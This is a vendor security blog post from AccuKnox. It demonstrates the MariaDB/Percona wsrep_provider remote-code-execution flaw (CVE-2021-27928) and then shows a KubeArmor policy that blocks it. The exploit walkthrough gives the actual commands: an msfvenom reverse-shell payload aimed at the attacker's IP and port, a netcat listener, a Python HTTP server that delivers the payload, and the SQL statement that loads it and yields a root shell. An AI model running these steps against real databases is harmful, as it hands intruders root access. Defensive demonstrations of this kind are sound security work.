Protecting Percona DB Server from CVE-2021-27928 – Accuknox
Introduction Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders. Every database has different threats, so we will see an insider threat where a malicious user can exploit remote […]
Reading Time: 3 minutes
Table of Contents
Introduction
Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.
Every database has different threats, so we will see an insider threat where a malicious user can exploit remote code execution in Percona PMM Server. We will first learn about the vulnerability and walk through the exploit itself to see how we can protect it against.
Vulnerability Assessment
So, let us understand the vulnerability. Remote code execution is the core issue here. An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. To run this exploit, you can install any of the following versions below.
Prerequisites:
- MariaDB 10.2 before 10.2.37,
Or 10.3 before 10.3.28,
Or 10.4 before 10.4.18,
Or 10.5 before 10.5.9 - Percona Server through 2021-03-03
The specific version has already been installed in our test-machine, as you can see below. root@kali will be our victim machine.
Percona server
The Exploit?
We will connect to another machine and then will start with the exploitation. host@h will be the attacker’s machine.
Step 1:
Let’s create our reverse shell payload with msfvenom. For our payload we will use /Linux/x64/shell_reverse_tcp.
[NOTE] Change LHOST to your IP address.
host@h:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so
LHOST
Step 2:
Now we will use Netcat to listen to the specified port.
host@h:~# nc -lvp -8181 listening on [any] 8181 ..
Netcat
Step 3:
We will copy the payload to the victim machine. Here we will be using the python HTTP server.
host@h:~# python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)…
python HTTP server
Now let us check our listener we successfully obtained root shell access.
Step 4:
Now let us get into the victim machine and download the payload. To do that just follow the commands below.
Command
Step 5:
We will now execute the payload.
root@kali:~# mysql -u root -p -h 127.0.0.1 -e ‘SET GLOBAL wsrep_provider=”/tmp/CVE-2021-27928.so”;’ Enter password: ERROR 2013 (HY000) at line
Payload
Now let us check our listener we successfully obtained root shell access.
Root shell
MYSQL
Let us see how we can protect it using the KubeArmor security policy.
How to use KubeArmor on your VM
Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various different workloads, curated by Security Experts. Check out the following link to view our other Policy Templates.
Kubearmor policy
We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy just copy and paste the following command in your terminal.
karmor vm policy add vm-cve-2021-27928.yaml
VM policy
root@kali:~ # karmor vm policy add vm-cve-2021-27928.yaml Success
VM policy
Once the policy is applied let us execute the payload and see what happens.
Root shell
It won’t open the dependencies used by wresp_provider and we won’t get the root shell access in the attacker machine and terminate the payload execution.
To check for logs just copy-paste the following command in your terminal.
karmor log –json
Logs
Conclusion
In this blog, we have seen how single unwanted permission in a variable from your DB’s codebase could be abused to gain root access to your system. There are several other exploits too that can be used against when you’re running an outdated version of any database. Hence the solution is to always keep your DB versions updated to the latest patch as soon as it’s released by the vendors.
KubeArmor is a cloud run-time security tool by AccuKnox that makes the job of detecting such vulnerabilities and patching them up easier when the manual updates take time. To learn more about AccuKnox and its products, check out the links below.
KubeArmor website: https://kubearmor.io/
KubeArmor GitHub: https://github.com/kubearmor/KubeArmor
KubeArmor Slack: Join Us
Now you can protect your workloads in minutes using AccuKnox, it is available to protect your Kubernetes and other cloud workloads using Kernel Native Primitives such as AppArmor, SELinux, and eBPF.
Let us know if you are seeking additional guidance in planning your cloud security program.
- Schedule 1:1 Demo
- Product Tour
On an average Zero Day Attacks cost $3.9M
4+
Marketplace Listings
7+
Regions
33+
Compliance Coverage
37+
Integrations Support